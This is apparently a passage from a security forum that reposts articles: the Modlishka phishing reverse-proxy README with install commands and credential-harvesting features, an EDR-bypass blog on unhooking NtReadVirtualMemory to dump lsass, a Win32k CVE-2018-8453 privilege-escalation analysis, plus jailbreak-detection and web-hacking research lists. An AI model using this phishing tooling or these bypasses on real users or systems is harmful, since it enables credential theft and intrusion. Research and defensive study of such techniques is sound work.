<slirp_uma_alloc> 0x7fff9457d8a4 <slirp_uma_alloc>: mov rdx,QWORD PTR [rbx+0x20] => 0x7fff9457d8a8 <slirp_uma_alloc>: mov QWORD PTR [rax+0x20],rdx 0x7fff9457d8ac <slirp_uma_alloc>: mov rax,QWORD PTR [rbx+0x18] 0x7fff9457d8b0 <slirp_uma_alloc>: mov rdx,QWORD PTR [rbx+0x20] 0x7fff9457d8b4 <slirp_uma_alloc>: mov QWORD PTR [rdx],rax 0x7fff9457d8b7 <slirp_uma_alloc>: mov rax,QWORD PTR [r12+0x88] [------------------------------------stack-------------------------------------] 0000| 0x7fff8ccf39b0 --> 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 (--> ...) 0008| 0x7fff8ccf39b8 --> 0x140e720 --> 0xdead0002 0016| 0x7fff8ccf39c0 --> 0x7fff8e5eddde --> 0x5b0240201045 0024| 0x7fff8ccf39c8 --> 0x140dac4 --> 0x0 0032| 0x7fff8ccf39d0 --> 0x140e730 --> 0x219790326 0040| 0x7fff8ccf39d8 --> 0x140dac4 --> 0x0 0048| 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 --> 0x7fff8ccf3cf0 (--> ...) 0056| 0x7fff8ccf39e8 --> 0x7fff9457df41 (<uma_zalloc_arg>: test rax,rax) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV Posted by Reno Robert at 6:41 PM Sursa: https://www.voidsecurity.in/2019/01/virtualbox-tftp-server-pxe-boot.html
  19. ..Modlishka.. Modlishka is a flexible and powerful reverse proxy, that will take your phishing campaigns to the next level (with minimal effort required from your side). Enjoy Features Some of the most important 'Modlishka' features : Support for majority of 2FA authentication schemes (by design). No website templates (just point Modlishka to the target domain - in most cases, it will be handled automatically). Full control of "cross" origin TLS traffic flow from your victims browsers (through custom new techniques). Flexible and easily configurable phishing scenarios through configuration options. Pattern based JavaScript payload injection. Striping website from all encryption and security headers (back to 90's MITM style). User credential harvesting (with context based on URL parameter passed identifiers). Can be extended with your ideas through plugins. Stateless design. Can be scaled up easily for an arbitrary number of users - ex. through a DNS load balancer. Web panel with a summary of collected credentials and user session impersonation (beta). Written in Go. Action "A picture is worth a thousand words": Modlishka in action against an example 2FA (SMS) enabled authentication scheme: https://vimeo.com/308709275 Note: google.com was chosen here just as a POC. Installation Latest source code version can be fetched from here (zip) or here (tar). Fetch the code with 'go get' : $ go get -u github.com/drk1wi/Modlishka Compile the binary and you are ready to go: $ cd $GOPATH/src/github.com/drk1wi/Modlishka/ $ make # ./dist/proxy -h Usage of ./dist/proxy: -cert string base64 encoded TLS certificate -certKey string base64 encoded TLS certificate key -certPool string base64 encoded Certification Authority certificate -config string JSON configuration file. Convenient instead of using command line switches. -credParams string Credential regexp collector with matching groups. Example: base64(username_regex),base64(password_regex) -debug Print debug information -disableSecurity Disable security features like anti-SSRF. Disable at your own risk. -jsRules string Comma separated list of URL patterns and JS base64 encoded payloads that will be injected. -listeningAddress string Listening address (default "127.0.0.1") -listeningPort string Listening port (default "443") -log string Local file to which fetched requests will be written (appended) -phishing string Phishing domain to create - Ex.: target.co -plugins string Comma seperated list of enabled plugin names (default "all") -postOnly Log only HTTP POST requests -rules string Comma separated list of 'string' patterns and their replacements. -target string Main target to proxy - Ex.: https://target.com -targetRes string Comma separated list of target subdomains that need to pass through the proxy -terminateTriggers string Comma separated list of URLs from target's origin which will trigger session termination -terminateUrl string URL to redirect the client after session termination triggers -tls Enable TLS (default false) -trackingCookie string Name of the HTTP cookie used to track the victim (default "id") -trackingParam string Name of the HTTP parameter used to track the victim (default "id") Usage Check out the wiki page for a more detailed overview of the tool usage. FAQ (Frequently Asked Questions) Blog post License Modlishka was made by Piotr Duszyński (@drk1wi). You can find the license here. Credits Thanks for helping with the code go to Giuseppe Trotta (@Giutro) Disclaimer This tool is made only for educational purposes and can be only used in legitimate penetration tests. Author does not take any responsibility for any actions taken by its users. Sursa: https://github.com/drk1wi/Modlishka
  20. JANUARY 18TH, 2019 Jailbreak Detector Detector: An Analysis of Jailbreak Detection Methods and the Tools Used to Evade Them Why Do People Jailbreak? Apple’s software distribution and security model relies on end users running software exclusively distributed by Apple, either via inclusion in the base operating system or via the App Store. To run applications that are not available in the App Store or make modifications to the behavior of the operating system, a “jailbreak” is required—effectively, an exploit that allows the user to gain administrative access to the iOS device. After jailbreaking, users can install applications and tweaks via unofficial app stores. Jailbroken devices are also excellent tools for security researchers. iOS kernel security research is significantly easier with root-level access to the device. Gal Beniamini from Google’s Project Zero says: Apple does not provide a “developer-mode” iPhone, nor is there a mechanism to selectively bypass the security model. This means that in order to meaningfully explore the system, researchers are forced to subvert the device’s security model (i.e., by jailbreaking). In short, people jailbreak their devices for many reasons, ranging from research to personal philosophy. Regardless of the user’s rationale, the presence of a jailbreak on a device means that the security model of the OS can no longer be adequately trusted or reasoned about by an application. The History of Jailbreaking The first iPhone was released in June 2007, and in August 2007, George Hotz became the first person to carrier-unlock the iPhone. A carrier-unlock is not the same as a jailbreak, but in this case, jailbreaking the device was a prerequisite. Hotz’s original exploit required a small hardware modification to the device, but software-only jailbreaks were released soon after. Since then, Apple and jailbreak developers have been in a cat-and-mouse game, with Apple patching vulnerabilities while developers and researchers attempt to find new ones. The jailbreak scene has shrunk significantly since the release of the original iPhone. As Apple hardens the security of its iOS devices, exploiting them becomes significantly harder. The value of an iOS exploit on the private market is easily several hundred thousand dollars, and can also exceed $1,000,000 under the right criteria (remote, persistent and zero-click), making a private sale a much more lucrative option than releasing it publicly. Why Do We Care About Jailbreaking at Duo? At Duo, we give administrators insight into the health of devices used to access corporate resources. In a BYOD context, it is important to be able to understand the security properties of the devices on your network. Jailbreaking an iOS device does not, on its own, make it less secure. There are two main issues with the security of a jailbroken device: First, running untrusted (non-App-Store*) code on the device, especially outside of the sandbox, makes it harder to reason about the security properties of the device. The second, more concerning issue is that users of jailbroken devices frequently hold off on updating their devices, as jailbreak development usually lags behind official software releases. Administrators may want to only allow up-to-date devices access to resources on their network, as software updates frequently patch security vulnerabilities. A jailbroken device can masquerade as an up-to-date device by misreporting its software version. As a result, administrators cannot trust version information submitted by jailbroken devices, so it is important to be able to detect the jailbroken state. * While, in general, we can expect that the App Store review process will prevent actively malicious applications from distribution on the App Store, this is not always the case. The XcodeGhost malware is an example of how malicious code was shipped as part of well-known and trusted applications on the App Store. How Are Jailbreaks Usually Detected? There exists only scattered information online about jailbreak detection methodology. This is partially because jailbreak detection is a sort of “special sauce.” Developers of mobile applications would rather keep their methodology private, and there are no real incentives to talking about it publicly. I was able to learn about existing jailbreak detection methods from some online documentation and communities like r/jailbreak, but most of the useful information I learned in the course of this research came from reverse engineering popular anti-jailbreak-detection tools. Most jailbreak detection methods fall into the following categories: File existence checks URI scheme registration checks Sandbox behavior checks Dynamic linker inspection File Existence Most public jailbreak methods leave behind certain files on the filesystem. The clearest example is Cydia. Cydia is an alternative app store commonly used to distribute tweaks (UI changes, extra gestures, etc.) and third-party applications to users of jailbroken devices. As a result, nearly every jailbroken device has a directory at /Applications/Cydia.app. If this file exists on the filesystem, you can be sure your application is running on a jailbroken device. There are also various binaries such as bash and sshd commonly found on jailbroken devices, as well as files intentionally left by jailbreak utilities to mark that a device has already been jailbroken, preventing the utility from running twice and possibly causing unintended harm. URI Schemes iOS applications can register custom URI schemes. Duo uses this functionality so that clickable web links can open the Duo Mobile app, making the setup of Duo Mobile easy. Cydia registered the cydia:// URI scheme to allow direct links to apps available via Cydia. iOS allows applications to check which URI schemes are registered, so the presence of the cydia://URI scheme is frequently used to check if Cydia is installed and the device is jailbroken. Unfortunately, some apps perform this detection by attempting to register the cydia:// URI scheme for themselves, so checking if the scheme is registered may produce a false-positive on a non-jailbroken device. Sandbox Behavior Jailbreaks frequently patch the behavior of the iOS application sandbox. As an example, calls to fork() are disallowed on a stock iOS device: an iOS app may not spawn a child process. If you are able to successfully execute fork(), your code is likely running on a jailbroken device. Dynamic Linker Inspection Dynamic linking is a way for executables to take advantage of code provided by other libraries without compiling and shipping that code in the executable. This helps different executables reuse code without including a copy of it. Dynamic linking allows for much smaller binaries with the same functionality - the alternative to this is “static linking,” where all code that an executable uses is shipped with the executable. While we haven’t discussed them yet, anti-jailbreak-detection tools are frequently loaded as dynamic libraries. The iOS dynamic linker is called dyld, and exposes the ability to inspect the libraries loaded into the currently-running process. As a result, we should be able to detect the presence of anti-jailbreak-detection tools by looking at the names and numbers of libraries loaded into the current process. If an anti-jailbreak-detection tool is running, we know the device is jailbroken. How Do End Users Prevent Detection? Many mobile applications will refuse to run if they detect that the device they are running on is jailbroken. In Duo’s case, we do not prevent use of the Duo Mobile app, but Duo administrators may prevent jailbroken devices from authenticating to protected applications. For these reasons, users of jailbroken devices frequently install anti-jailbreak-detection tools that aim to hide the tampered status of the device. These tools modify operating system functionality such that the device acts as though it were in an untampered state. They are effectively a type of intentionally installed rootkit, though generally running in userland rather than in the iOS kernel. The specific functions that are hooked and the methods used to hook them vary. Objective-C Runtime Method Hooking Objective-C dispatches method calls at runtime. Calling a method is akin to sending a message (ala Smalltalk). This stands counter to languages like C in which a function call might take the form of a jump to the called method’s location in memory. Because method calls are dispatched at runtime, Objective-C also allows you to add or replace methods at runtime. This is sometimes referred to as “method swizzling,” and takes the form of a call to class_addMethod or method_setImplementation. fileExistsAtPath is an Objective-C method commonly used to check for the existence of jailbreak artifacts. Replacing the implementation of fileExistsAtPath to always return false for a list of known jailbreak artifacts is a common strategy to defeat this jailbreak detection technique. Editing the Linker Table When a dynamically loaded library is used in an executable, its symbols must be bound: the executable has to figure out where the shared code actually lives in memory. On an iOS system using dyld, a call to printf, for example, is actually a call to an address that lives in the __stubs section. At this address is a single jmp instruction to an address loaded from the __la_symbol_ptr (lazy symbol pointers) or __nl_symbol_ptr (non-lazy symbol pointers) section. Lazy symbol pointers are resolved the first time they are called, and non-lazy symbol pointers are resolved before the program runs. You can read more about how the linker works on Mike Ash’s blog, but the important thing to understand is that the entry in the __xx_symbol_ptr table will, after the symbol has been resolved, contain the proper address for the function being called. A consequence of this design is that if you want to hook every call to printf, you can do so by replacing a single entry in the __la_symbol_ptr section. All calls to printf from that point on will jump to your custom hook. Anti-jailbreak-detection tools make use of this technique to hook functions that may be used to check for file existence or that may expose non-standard sandbox behavior. This is an example of a hooked version of the fopen function. As a reminder, the fopen function will attempt to open a file (by path name), and either return a pointer to the open file handle or null if it cannot open the file. If fopen returns non-null when called with a path to a known jailbreak artifact, you can be sure the device is jailbroken. The above hooked version checks the path of the file to be opened against a list of “forbidden” files. These are known jailbreak artifacts as well as files that are usually present on the system but can only be opened if the sandbox has been modified. The hooked fopen will act as though those files do not exist or cannot be opened, and otherwise defer to the original fopen implementation. Functions like fopen, lstat, etc. are hooked to prevent detection of files on the filesystem. Some other functions, such as fork, as hooked to always return a constant value (for example: a hooked version of fork may return -1, indicating that fork is not allowed, which is consistent with the behavior of an untampered sandbox). Patching the Linker We mentioned that dyld exposes functionality that allows clients to inspect what libraries have been loaded into the running process. Anti-jailbreak-detection tools are loaded into processes as shared libraries, and dyld will expose this. To combat this, some anti-jailbreak-detection tools also hook exposed dyld functionality to hide their presence. A slightly more interesting way to detect the presence of a jailbreak using the dynamic linker makes use of dlsym to try to determine the addresses of the original, unhooked functions. dlsym should give you the correct address for a dynamically linked function, even if its entry in the linker symbol table has been overwritten. Some anti-jailbreak-detection tools are aware of this, and will actually intercept calls to dlsym and return pointers to the hooked functions. This is an interesting example of the cat-and-mouse game that has been played between app developers who wish to detect jailbroken devices and hobby developers who maintain anti-jailbreak-detection tools. Summary These are only some of the methods used to evade jailbreak detection. While they differ in nature, they all rely on various forms of indirection: functionality provided by the Objective-C runtime or by shared libraries can be overridden with ease and made to report “correct” answers, similar to a rootkit. An ideal jailbreak detection method would rely on as little indirection as possible. Can We Reliably Detect Jailbroken Devices? We would like to look for artifacts of a jailbroken device (existence of certain files, sandbox behavior, etc,) while relying on as little shared functionality as possible. However, we need to rely on functionality exposed by the operating system to make these checks. In the usual case, to check if a file can be opened, we would call the fopen syscall wrapper exposed as part of a shared library. As detailed in previous sections, functions in shared libraries might be replaced with tampered versions that prevent our checks from working. As a refresher, a syscall is an interface to privileged functionality exposed to userspace code by the kernel. It may be dangerous to allow userspace code to directly read or write blocks on a hard drive, for example, so we instead use the open syscall to say “hey kernel, can you please perform the privileged action of opening this file for me, and then give me a handle I can use to interact with it.” Functions like fopen are just that—functions—but they wrap a special type of instruction used to jump into the kernel. On the x86 architecture, under Linux, the INT 0x80 instruction is the most well-known way to perform a syscall (with newer options available, like the x86-64 syscall instruction). INT stands for “interrupt,” and the INT instruction causes the CPU to jump to a special section of code called an interrupt handler, running in the context of the kernel. The end result is that userspace can trigger the execution of privileged code in a controlled manner, without being able to arbitrarily execute privileged code. The iPhone uses the ARM processor architecture. ARM’s equivalent of INT is the SVC opcode (“Supervisor Call”), and the equivalent to INT 0x80 on an ARM processor is SVC 0x80. Functions like fopen may do some sanity-checking and processing of arguments in user-space, but they will eventually use SVC 0x80 to ask the kernel to perform the privileged action of providing access to a file. The important takeaway here is that if we would like to avoid relying on shared wrapper functions that may be hooked, we can actually perform syscalls directly using the same opcodes the wrapper functions use. We can also inline these calls to avoid having a single call target for our custom syscall wrappers that might be overwritten. This lets us avoid the layers of indirection that come with jumping to functions exposed by shared libraries, shielding us from possible symbol table tampering. Drawbacks Even though this approach solves some of our problems, there are drawbacks. First, writing custom syscall wrappers can require maintenance, especially if there are new architectures you need to support. Additionally, the syscall interface may change over time, and the shared libraries provided by the operating system will keep up with those changes, whereas your custom implementation may not. Second, while this approach makes it harder for end users to evade jailbreak detection, it doesn’t make it impossible. The flow of the data after the syscall—say, a boolean that indicates whether a jailbreak artifact exists—is still vulnerable to tampering. Additionally, a determined attacker could patch out the checks, or even possibly modify the kernel. Conclusion Approaches like this must be considered in the context of a threat model. It is impossible to guaranteethat you will be able to detect a tampered device for the simple reason that you are restricted to running in userspace, whereas anti-jailbreak-detection utilities can run in a privileged context. With that said, the goal is not perfect security, but rather sufficient security such that the average end user of a jailbroken device—who is not a determined attacker—will not be able to evade detection. Ultimately, the security of your application cannot rely on hiding the way it works. Proper server-side validation of client-submitted data, use of well-known cryptographic protocols, and use of hardware-backed cryptographic functionality available in many newer devices all go a long way to strengthening the security posture of your application without relying on obscurity. Sursa: https://duo.com/blog/jailbreak-detector-detector
  21. Top 10 web hacking techniques of 2018 - nominations open James Kettle | 03 January 2019 at 14:43 UTC Nominations are now open for the top 10 new web hacking techniques of 2018. Every year countless security researchers share their findings with the community. Whether they're elegant attack refinements, empirical studies, or entirely new techniques, many of them contain innovative ideas capable of inspiring new discoveries long after publication. And while some inevitably end up on stage at security conferences, others are easily overlooked amid a sea of overhyped disclosures, and doomed to fade into obscurity. As such, each year we call upon the community to help us seek out, distil, and preserve the very best new research for future readers. As with last year, we’ll do this in three phases: Jan 1st: Start to collect community nominations Jan 21st: Launch community vote to build shortlist of top 15 Feb 11th: Panel vote on shortlist to select final top 10 Last year we decided to prevent conflicts of interest by excluding PortSwigger research, but found the diverse voting panel meant we needed a better system. We eventually settled on disallowing panelists from voting on research they’re affiliated with, and adjusting the final scores to compensate. This approach proved fair and effective, so having checked with the community we'll no longer exclude our own research. To nominate a piece of research, either use this form or reply to this Twitter thread. Feel free to make multiple nominations, and nominate your own research, etc. It doesn't matter whether the submission is a blog post, whitepaper, or presentation recording - just try to submit the best format available. If you want, you can take a look at past years’ top 10 to get an idea for what people feel constitutes great research. You can find previous year's results here: 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016/17. Nominations so far Here are the nominations so far. We're making offline archives of them all as we go, so we can replace any that go missing in future. I'll do a basic quality filter before the community vote starts. How I exploited ACME TLS-SNI-01 issuing Let’s Encrypt SSL-certs for any domain using shared hosting Kicking the Rims - A Guide for Securely Writing and Auditing Chrome Extensions | The Hacker Blog EdOverflow | An analysis of logic flaws in web-of-trust services. OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies PowerPoint Presentation - OWASP_AppSec_EU18_WordPress.pdf Scratching the surface of host headers in Safari RCE by uploading a web.config – 003Random’s Blog Security: HTTP Smuggling, Apsis Pound load balancer | RBleug Piercing the Veil: Server Side Request Forgery to NIPRNet access inputzero: A bug that affects million users - Kaspersky VPN | Dhiraj Mishra inputzero: Telegram anonymity fails in desktop - CVE-2018-17780 | Dhiraj Mishra inputzero: An untold story of skype by microsoft | Dhiraj Mishra Neatly bypassing CSP – Wallarm Large-Scale Analysis of Style Injection by Relative Path Overwrite - www2018rpo_paper.pdf Beyond XSS: Edge Side Include Injection :: GoSecure GitHub - HoLyVieR/prototype-pollution-nsec18: Content released at NorthSec 2018 for my talk on prototype pollution Logically Bypassing Browser Security Boundaries - Speaker Deck Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out Web Cache Deception Attack - YouTube Duo Finds SAML Vulnerabilities Affecting Multiple Implementations | Duo Security #307670 Difference in query string parameter processing between Hacker News and Keybase Chrome extension spawns chat to incorrect user lanmaster53.com Beyond XSS: Edge Side Include Injection :: GoSecure Scratching the surface of host headers in Safari #309531 Stored XSS in Snapmatic + R★Editor comments InsertScript: Adobe Reader PDF - Client Side Request Injection $36k Google App Engine RCE - Ezequiel Pereira MKSB(en): CVE-2018-5175: Universal CSP strict-dynamic bypass in Firefox #341876 SSRF in Exchange leads to ROOT access in all instances reCAPTCHA bypass via HTTP Parameter Pollution – Andres Riancho Data Exfiltration via Formula Injection #Part1 Read&Write Chrome Extension Same Origin Policy (SOP) Bypass Vulnerability | The Hacker Blog Firefox uXSS and CSS XSS - Abdulrahman Al-Qabandi Server-Side Spreadsheet Injection - Formula Injection to Remote Code Execution - Bishop Fox Bypassing Web-Application Firewalls by abusing SSL/TLS | 0x09AL Security blog Evading CSP with DOM-based dangling markup | Blog Save Your Cloud: DoS on VMs in OpenNebula 4.6.1 CRLF Injection Into PHP’s cURL Options – TomNomNom – Medium Practical Web Cache Poisoning | Blog #317476 Account Takeover in Periscope TV A timing attack with CSS selectors and Javascript VPN Extensions are not for privacy Exposing Intranets with reliable Browser-based Port scanning | Blog Exploiting XXE with local DTD files A story of the passive aggressive sysadmin of AEM - Speaker Deck Hunting for security bugs in AEM webapps - Speaker Deck ASP.NET resource files (.RESX) and deserialisation issues Story of my two (but actually three) RCEs in SharePoint in 2018 | Soroush Dalili (@irsdl) – سروش دلیلی Beware of Deserialisation in .NET Methods and Classes + Code Execution via Paste! cat ~/footstep.ninja/blog.txt Blog - RCE due to ShowExceptions MB blog: Vulnerability in Hangouts Chat: from open redirect to code execution Blog on Gopherus Tool DNS Rebinding Headless Browsers It's A PHP Unserialization Vulnerability Jim But Not As We Know It James Kettle @albinowax Sursa: https://portswigger.net/blog/top-10-web-hacking-techniques-of-2018-nominations-open
      • 1
      • Upvote
  22. Bypass EDR’s memory protection, introduction to hooking Hoang BuiFollow Jan 18 Introduction On a recent internal penetration engagement, I was faced against an EDR product that I will not name. This product greatly hindered my ability to access lsass’ memory and use our own custom flavor of Mimikatz to dump clear-text credentials. For those who recommends ProcDump The Wrong Path So now, as an ex-malware author — I know that there are a few things you could do as a driver to accomplish this detection and block. The first thing that comes to my mind was Obregistercallback which is commonly used by many Antivirus products. Microsoft implemented this callback due to many antivirus products performing very sketchy winapi hooks that reassemble malware rootkits. However, at the bottom of the msdn page, you will notice a text saying “Available starting with Windows Vista with Service Pack 1 (SP1) and Windows Server 2008.” To give some missing context, I am on a Windows server 2003 at the moment. Therefore, it is missing the necessary function to perform this block. After spending hours and hours, doing black magic stuff with csrss.exe and attempting to inherit a handle to lsass.exe through csrss.exe, I was successful in gaining a handle with PROCESS_ALL_ACCESS to lsass.exe. This was through abusing csrss to spawn a child process and then inherit the already existing handle to lsass. There is no EDR solution on this machine, this was just an PoC However, after thinking “I got this!” and was ready to rejoice in victory over defeating a certain EDR, I was met with a disappointing conclusion. The EDR blocked the shellcode injection into csrss as well as the thread creation through RtlCreateUserThread. However, for some reason — the code while failing to spawn as a child process and inherit the handle, was still somehow able to get the PROCESS_ALL_ACCESS handle to lsass.exe. WHAT?! Hold up, let me try just opening a handle to lsass.exe without any fancy stuff with just this line: HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, lsasspid); And what do you know, I got a handle with FULL CONTROL over lsass.exe. The EDR did not make a single fuzz about this. This is when I realized, I started off the approach the wrong way and the EDR never really cared about you gaining the handle access. It is what you do afterward with that handle that will come under scrutiny. Back on Track Knowing there was no fancy trick in getting a full control handle to lsass.exe, we can now move forward to find the next point of the issue. Immediately calling MiniDumpWriteDump() with the handle failed spectacularly. Let’s dissect this warning further. “Violation: LsassRead”. I didn’t read anything, what are you talking about? I just want to do a dump of the process. However, I also know that to make a dump of a remote process, there must be some sort of WINAPI being called such as ReadProcessMemory (RPM) inside MiniDumpWriteDump(). Let’s look at MiniDumpWriteDump’s source code at ReactOS. Multiple calls to RPM As you can see by, the function (2) dump_exception_info(), as well as many other functions, relies on (3) RPM to perform its duty. These functions are referenced by MiniDumpWriteDump (1) and this is probably the root of our issue. Now here is where a bit of experience comes into play. You must understand the Windows System Internal and how WINAPIs are processed. Using ReadProcessMemory as an example — it works like this. ReadProcessMemory is just a wrapper. It does a bunch of sanity check such as nullptr check. That is all RPM does. However, RPM also calls a function “NtReadVirtualMemory”, which sets up the registers before doing a syscall instruction. Syscall instruction is just telling the CPU to enter kernel mode which then another function ALSO named NtReadVirtualMemory is called, which does the actual logic of what ReadProcessMemory is supposed to do. — — — — — -Userland — — — —- — — — | — — — Kernel Land — — — — RPM — > NtReadVirtualMemory --> SYSCALL->NtReadVirtualMemory Kernel32 — — -ntdll — — — — — — — — — - — — — — — ntoskrnl With that knowledge, we now must identify HOW the EDR product is detecting and stopping the RPM/NtReadVirtualMemory call. This comes as a simple answer which is “hooking”. Please refer to my previous post regarding hooking here for more information. In short, it gives you the ability to put your code in the middle of any function and gain access to the arguments as well as the return variable. I am 100% sure that the EDR is using some sort of hook through one or more of the various techniques that I mentioned. However, readers should know that most if not all EDR products are using a service, specifically a driver running inside kernel mode. With access to the kernel mode, the driver could perform the hook at ANY of the level in the RPM’s callstack. However, this opens up a huge security hole in a Windows environment if it was trivial for any driver to hook ANY level of a function. Therefore, a solution is to put forward to prevent modification of such nature and that solution is known as Kernel Patch Protection (KPP or Patch Guard). KPP scans the kernel on almost every level and will triggers a BSOD if a modification is detected. This includes ntoskrnl portion which houses the WINAPI’s kernel level’s logic. With this knowledge, we are assured that the EDR would not and did not hook any kernel level function inside that portion of the call stack, leaving us with the user-land’s RPM and NtReadVirtualMemory calls. The Hook To see where the function is located inside our application’s memory, it is as trivial as a printf with %p format string and the function name as the argument, such as below. However, unlike RPM, NtReadVirtualMemory is not an exported function inside ntdll and therefore you cannot just reference to the function like normal. You must specify the signature of the function as well as linking ntdll.lib into your project to do so. With everything in place, let’s run it and take a look! Now, this provides us with the address of both RPM and ntReadVirtualMemory. I will now use my favorite reversing tool to read the memory and analyze its structure, Cheat Engine. ReadProcessMemory NtReadVirtualMemory For the RPM function, it looks fine. It does some stack and register set up and then calls ReadProcessMemory inside Kernelbase (Topic for another time). Which would eventually leads you down into ntdll’s NtReadVirtualMemory. However, if you look at NtReadVirtualMemory and know what the most basic detour hook look like, you can tell that this is not normal. The first 5 bytes of the function is modified and the rest are left as-is. You can tell this by looking at other similar functions around it. All the other functions follows a very similar format: 0x4C, 0x8B, 0xD1, // mov r10, rcx; NtReadVirtualMemory 0xB8, 0x3c, 0x00, 0x00, 0x00, // eax, 3ch — aka syscall id 0x0F, 0x05, // syscall 0xC3 // retn With one difference being the syscall id (which identifies the WINAPI function to be called once inside kernel land). However, for NtReadVirtualMemory, the first instruction is actually a JMP instruction to an address somewhere else in memory. Let’s follow that. CyMemDef64.dll Okay, so we are no longer inside ntdll’s module but instead inside CyMemdef64.dll’s module. Ahhhhh now I get it. The EDR placed a jump instruction where the original NtReadVirtualMemory function is supposed to be, redirect the code flow into their own module which then checked for any sort of malicious activity. If the checks fail, the Nt* function would then return with an error code, never entering the kernel land and execute to begin with. The Bypass It is now very self-evident what the EDR is doing to detect and stop our WINAPI calls. But how do we get around that? There are two solutions. Re-Patch the Patch We know what the NtReadVirtualMemory function SHOULD looks like and we can easily overwrite the jmp instruction with the correct instructions. This will stop our calls from being intercepted by CyMemDef64.dll and enter the kernel where they have no control over. Ntdll IAT Hook We could also create our own function, similar to what we are doing in Re-Patch the Patch, but instead of overwriting the hooked function, we will recreate it elsewhere. Then, we will walk Ntdll’s Import Address Table, swap out the pointer for NtReadVirtualMemory and points it to our new fixed_NtReadVirtualMemory. The advantage of this method is that if the EDR decides to check on their hook, it will looks unmodified. It just is never called and the ntdll IAT is pointed elsewhere. The Result I went with the first approach. It is simple, and it allows me to get out the blog quicker :). However, it would be trivial to do the second method and I have plans on doing just that within a few days. Introducing AndrewSpecial, for my manager Andrew who is currently battling a busted appendix in the hospital right now. Get well soon man. AndrewSpecial.exe was never caught :P Conclusion This currently works for this particular EDR, however — It would be trivial to reverse similar EDR products and create a universal bypass due to their limitation around what they can hook and what they can’t (Thank you KPP). Did I also mention that this works on both 64 bit (on all versions of windows) and 32 bits (untested)? And the source code is available HERE. Thank you again for your time and please let me know if I made any mistake. Sursa: https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6
  23. CVE-2018-8453:Win32k Elevation of Privilege Vulnerability Targeting the Middle East 2019-01-19 By 360威胁情报中心 | 技术研究 Background On October 10, 2018, Kaspersky disclosed a Win32k Elevation of Privilege Exploit (CVE-2018-8453) captured in August. This vulnerability was used as 0day in attacks targeting the Middle East to escalate privileges on the compromised Windows systems. It is related to window management and graphic device interfaces (win32kfull.sys) and could be used to elevate user privileges to system permissions. It can also be used to bypass sandbox protection such as PDF, Office and IE which makes the exploit extremely valuable. 360 Threat Intelligence Center performed deep analysis of this vulnerability and came up with PoC exploit that could work on part of the affected Windows systems (Both x86 and x64 version of Windows10). Analysis Environment The work was performed on Windows 10 x64 Version 1709 with patches before fixing CVE-2018-8453: Root Cause This vulnerability is caused by a fault in the win32kfull!NtUserSetWindowFNID function which fails to check whether the window object has been released while setting the FNID. This causes a new FNID to be set for a window that has already been released (FNID_FREED: 0x8000). By exploiting this defect, we can control the fnDWORD callback called in xxxFreeWindow when the window object get destroyed to cause UAF of pSBTrack in win32kfull!xxxSBTrackInit. About FNID:By checking the leaked source code of WIN2000 and related documentations in ReactOs, we figure out that FNID is used to record what the window looks like, such as a button or an edit box. It can also be used to record the state of the window, for example, FNID_FREED(0x8000) means the window has been released. POC – How to Trigger the Vulnerability The vulnerability could get triggered by following steps: Step 1: We need to hook two callbacks in the KernelCallbackTable first. Step 2: Create the main window and the ScrollBar. Step3: Send a WM_LBUTTONDOWN message to the scroll bar to trigger the call to the xxxSBTraackInit function. Hint: When you perform a left click on a scroll bar, it will trigger the call to win32kfull!xxxSBTrackInit function. After that, function xxxSBTrackLoop will be called to capture mouse events in a loop, until the left mouse button is released or some other messages are received. Step4: Call DestoryWindow(g_hMAINWND) in callback function fnDWORD_hook when it get executed by xxxSBTrackLoop. This will result in calling win32kfull!xxxFreeWindow function. Because cbWndExtra is not 0 while registering the main window, this makes win32kfull!xxxFreeWindow to call xxxClientFreeWindowClassExtraBytes function in order to release the extra data which belongs to the main window. Function in the above picture would execute KernelCallbackTable[126] callback which result in the calling of our second hook. Step5: After entering our second hook function (fnClientFreeWindowClassExtraBytesCallBack_hook), we must manually call NtUserSetWindowFNID(g_hMAINWND,spec_fnid) to set the FNID of the main window (a value from 0x2A1 to 0x2AA, here we set spec_find to 0x2A2). Meanwhile create a new scroll bar (g_hSBWNDNew) and call SetCapture(g_hSBWNDNew) to set g_hSBWNDNew as the window to capture mouse events in the current thread. Step6: Since the main window is destroyed, xxxSBTrackLoop will return and continue to execute HMAssignmentUnLock(&pSBTrack->spwndNotify) to perform related dereference that makes the main window get released completely. This will cause xxxFreeWindow to be called again: From the above picture, we know that once xxxFreeWindow is called, the window's FNID will be marked with 0x8000. Since the FNID of the main window was set to 0x2A2 in step 5, LOWORD(FNID) would be 0x82A2 (DestoryWindow function that get executed in step 4 called xxxFreeWindow to mark the main window with 0x8000). So SfnDWORD will be executed and then get into our hook through callback fnDWORD. When get into fnDWORD_hook function again, it is our last chance to come back to R3. At this time, if SendMessage(g_hSBWNDNew, WM_CANCLEMODE) is called, xxxEndScroll (see win2k code as shown below) will be executed to release pSBTrack. Because the POC program is single threaded, all windows created by the thread point to the same thread information structure. Even if the Scrollbar window that SBTrack belongs to has been released, as long as the new window is created by the same thread, pSBTrack still points to the same one. The condition qp->spwndCapture==pwnd will be satisfied since we are sending the WM_CANCLEMODE message to the newly created scroll bar g_hSBWNDNew, and we have previously called SetCaputure(g_hSBWNDNew) to set the current thread to capture the mouse events in g_hSBTWNDNew window. Finally, UserFreePool(pSBTrack) gets executed to release pSBTrack which makes pSBTrack get released before executing HMAssignmentUnLock(&pSBTrack->spwndSB) and results in Use After Free for pSBTrack. Exploit on Windows 10 x64 Since we can make the pSBTrack in win32kfull!xxxSBTrackInit get released early to make a Use After Free by hooking callbacks in KernelCallbackTable, pool fengshui technology can be used to occupy pSBTrack that has been released early in order to achieve arbitrary memory value deduction in a loop. It can be used with desktop heap memory [2] leak and GDI Palette Abuse technology to achieve arbitrary memory read/write, and finally to achieve privilege escalation! Implementation of Arbitrary Memory Value Deduction From the above analysis, we know that the memory pointed by pSBTrack has been released after calling 